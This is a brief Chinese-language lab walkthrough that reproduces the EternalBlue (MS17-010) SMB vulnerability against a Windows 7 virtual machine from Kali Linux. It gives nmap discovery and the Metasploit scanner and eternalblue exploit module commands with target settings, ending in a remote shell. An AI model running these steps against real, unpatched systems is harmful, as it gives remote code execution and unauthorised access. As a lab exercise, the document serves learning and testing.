永恒之蓝漏洞复现

漏洞复现

1、准备攻击机和靶机

攻击机：kali linux 192.168.1.20

靶机： windows7虚拟机

2、登录kali linux ,用nmap探测网段内存活主机

 可以看到靶机445端口是开启的

3、使用MSF的永恒之蓝攻击模块

打开MSF：msfconsole

然后搜索ms17-010 代码：search ms17-010

 在这里我们能够看到一些工具，其中

 auxiliary/scanner/smb/smb_ms17_010是扫描模板，对靶机进行扫描

exploit/windows/smb/ms17_010_eternalblue是攻击模板

使用模板    use 3

设置目标IP或网段

set rhosts 192.168.1.16

执行扫描：run

出现以上的【+】部分，说明漏洞存在

4、使用ms17-010的攻击模板，攻击靶机

使用模块 use 0

设置攻击目标的IP set rhosts 192.168.1.16

 进行攻击 exploit或run

 攻击完成

5、得到靶机shell

查看网络配置

 chcp 65001解决乱码问题